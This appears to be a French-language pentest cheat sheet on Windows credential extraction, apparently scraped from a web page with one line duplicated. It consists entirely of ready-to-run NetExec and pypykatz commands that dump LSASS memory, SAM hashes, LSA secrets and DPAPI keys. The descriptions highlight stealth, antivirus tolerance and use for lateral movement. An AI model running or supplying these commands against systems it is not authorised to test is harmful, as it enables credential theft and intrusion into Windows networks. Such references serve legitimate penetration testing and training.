nxc smb $TARGET -u $USER -p $PASS -M nanodumpDescription: Dump LSASS via nanodump : discret, ne touche pas le processus lsass.exe directement.
Windows Privilege Escalation
Extraire des credentials depuis LSASS, SAM, LSA et DPAPI sur les machines Windows.
nxc smb $TARGET -u $USER -p $PASS -M nanodumpDescription: Dump LSASS via nanodump : discret, ne touche pas le processus lsass.exe directement.
nxc smb $TARGET -u $USER -p $PASS -M lsassyDescription: lsassy : dump et parse LSASS en une seule opération, retourne les creds directement.
nxc smb $TARGET -u $USER -p $PASS -M procdumpDescription: Dump via procdump.exe (Sysinternals) : bruyant mais souvent autorisé par les AV.
pypykatz lsa minidump lsass.dmpDescription: Parser un minidump LSASS offline via pypykatz : extraire NT hashes et tickets Kerberos.
nxc smb $TARGET -u $USER -p $PASS --samDescription: Dump SAM via NXC : hashes des comptes locaux, utile pour le mouvement latéral.
nxc smb $TARGET -u $USER -p $PASS --lsaDescription: LSA secrets : mots de passe en cache, comptes de service, DCC2 hashes.
nxc smb $TARGET -u $USER -p $PASS --dpapiDescription: Dump DPAPI : clés maîtresses et secrets protégés (passwords manager, wifi, etc.).
nxc smb $TARGET -u $USER -p $PASS --sam --lsa --dpapiDescription: Collecte complète en une passe : SAM + LSA + DPAPI pour tout récupérer d'un coup.